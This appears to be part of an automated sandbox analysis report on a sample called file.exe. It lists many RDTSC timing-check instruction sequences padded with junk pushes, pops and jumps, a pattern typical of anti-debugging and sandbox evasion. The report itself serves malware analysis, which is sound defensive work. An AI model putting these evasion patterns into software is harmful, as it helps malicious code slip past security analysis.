Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E3035 second address: 5E303B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E333B second address: 5E3369 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F37B4535CD6h 0x00000009 jc 00007F37B4535CD6h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007F37B4535CE8h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E3369 second address: 5E336D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E7B2A second address: 5E7B71 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jo 00007F37B4535CD6h 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 popad 0x00000011 pushad 0x00000012 push ecx 0x00000013 jmp 00007F37B4535CE2h 0x00000018 pop ecx 0x00000019 pushad 0x0000001a jmp 00007F37B4535CDBh 0x0000001f push edi 0x00000020 pop edi 0x00000021 pushad 0x00000022 popad 0x00000023 popad 0x00000024 jmp 00007F37B4535CDDh 0x00000029 push edi 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E7CE4 second address: 5E7CEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E8117 second address: 5E811D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E811D second address: 5E8125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E8125 second address: 5E812F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E8294 second address: 5E82A4 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F37B4537096h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E82A4 second address: 5E82A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E82A8 second address: 5E82E2 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F37B4537096h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F37B453709Dh 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F37B45370A9h 0x00000018 jnp 00007F37B4537096h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E82E2 second address: 5E82F4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jnc 00007F37B4535CD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E82F4 second address: 5E82F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E86EF second address: 5E86F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E86F5 second address: 5E8730 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F37B45370A7h 0x0000000a jmp 00007F37B45370A1h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a push ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E8730 second address: 5E8735 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E8735 second address: 5E873B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E873B second address: 5E873F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E8882 second address: 5E888D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E888D second address: 5E8893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E8893 second address: 5E8897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5EE819 second address: 5EE822 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5ED640 second address: 5ED646 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5ED646 second address: 5ED64C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5EDCF8 second address: 5EDD03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5EDD03 second address: 5EDD07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5EE289 second address: 5EE28E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5F1443 second address: 5F1465 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F37B4535CF4h 0x00000008 jmp 00007F37B4535CE8h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5F1465 second address: 5F146D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5F146D second address: 5F1471 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 564332 second address: 56434C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F37B45370A6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5F65AD second address: 5F65EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B4535CE5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jmp 00007F37B4535CE8h 0x0000000f pop ecx 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 pop edx 0x00000017 push eax 0x00000018 pushad 0x00000019 popad 0x0000001a pop eax 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5F65EB second address: 5F65F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5F65F1 second address: 5F65F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5F61AD second address: 5F61B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5F61B1 second address: 5F61C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jng 00007F37B4535CD6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5FB0EE second address: 5FB0F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5FAD66 second address: 5FAD80 instructions: 0x00000000 rdtsc 0x00000002 je 00007F37B4535CD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F37B4535CDEh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5FF2F2 second address: 5FF2F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5FF71E second address: 5FF722 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5FF722 second address: 5FF745 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F37B45370A5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jne 00007F37B4537096h 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5FF745 second address: 5FF74B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5FF74B second address: 5FF751 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5FF751 second address: 5FF755 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5FF755 second address: 5FF76E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B453709Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F37B453709Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5B0A00 second address: 5B0A0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5B0A0A second address: 5B0A37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jo 00007F37B4537098h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e nop 0x0000000f mov dx, ax 0x00000012 push 00000004h 0x00000014 mov ecx, esi 0x00000016 nop 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push esi 0x0000001b pop esi 0x0000001c jmp 00007F37B45370A0h 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5FFA36 second address: 5FFA56 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F37B4535CE6h 0x00000008 jo 00007F37B4535CDEh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5FFB8B second address: 5FFBAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B45370A2h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007F37B4537098h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 603A70 second address: 603A76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 603A76 second address: 603A7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 603EFC second address: 603F03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 603F03 second address: 603F0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F37B4537096h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 603F0F second address: 603F2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B4535CE9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 603F2C second address: 603F4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F37B45370A6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 604097 second address: 6040B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 jmp 00007F37B4535CE3h 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6040B3 second address: 6040D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F37B4537096h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c push ecx 0x0000000d jmp 00007F37B45370A5h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 604242 second address: 60424A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 60424A second address: 604254 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 604254 second address: 604269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 pop eax 0x00000008 jmp 00007F37B4535CDCh 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 604269 second address: 604281 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 js 00007F37B4537096h 0x0000000b je 00007F37B4537096h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 604281 second address: 604291 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B4535CDCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 60A7CE second address: 60A7D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 60A7D2 second address: 60A7EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B4535CE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 60A7EA second address: 60A7FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 push eax 0x0000000a push eax 0x0000000b pop eax 0x0000000c pushad 0x0000000d popad 0x0000000e pop eax 0x0000000f popad 0x00000010 pushad 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 60A7FE second address: 60A807 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 60A807 second address: 60A80B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 60AF71 second address: 60AF75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 60B224 second address: 60B228 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 60B228 second address: 60B232 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F37B4535CD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 60B7E3 second address: 60B7EF instructions: 0x00000000 rdtsc 0x00000002 je 00007F37B4537096h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 60BDF7 second address: 60BE0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F37B4535CD6h 0x0000000a pushad 0x0000000b popad 0x0000000c jng 00007F37B4535CD6h 0x00000012 popad 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60C41A second address: 60C433 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F37B45370A3h 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60C433 second address: 60C444 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F37B4535CD6h 0x00000009 jng 00007F37B4535CD6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 612486 second address: 612492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 push edi 0x00000007 pop edi 0x00000008 pop edi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 616314 second address: 616318 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 615373 second address: 615380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jnc 00007F37B4537098h 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 615380 second address: 615385 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6156E6 second address: 615709 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B453709Ah 0x00000007 jmp 00007F37B453709Dh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e js 00007F37B453709Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 615709 second address: 615721 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007F37B4535CE6h 0x0000000c jmp 00007F37B4535CDAh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 615878 second address: 61587C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61587C second address: 61588C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jng 00007F37B4535CD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pop ecx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6159CC second address: 6159D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6159D0 second address: 6159E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F37B4535CD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jne 00007F37B4535CE6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 615B61 second address: 615B65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 615D1A second address: 615D24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F37B4535CD6h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 615D24 second address: 615D28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 615D28 second address: 615D31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 615D31 second address: 615D4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 js 00007F37B45370D4h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F37B453709Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 615D4C second address: 615D50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 616050 second address: 616054 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61F3D3 second address: 61F3D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61D8BC second address: 61D8F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F37B45370A4h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F37B45370A7h 0x00000014 jnp 00007F37B4537098h 0x0000001a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61D8F9 second address: 61D90B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F37B4535CDEh 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61DA23 second address: 61DA29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61DA29 second address: 61DA3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F37B4535CDCh 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61DA3A second address: 61DA40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61DA40 second address: 61DA44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61DA44 second address: 61DA61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B45370A9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61E16D second address: 61E173 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61E173 second address: 61E179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61E179 second address: 61E17D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
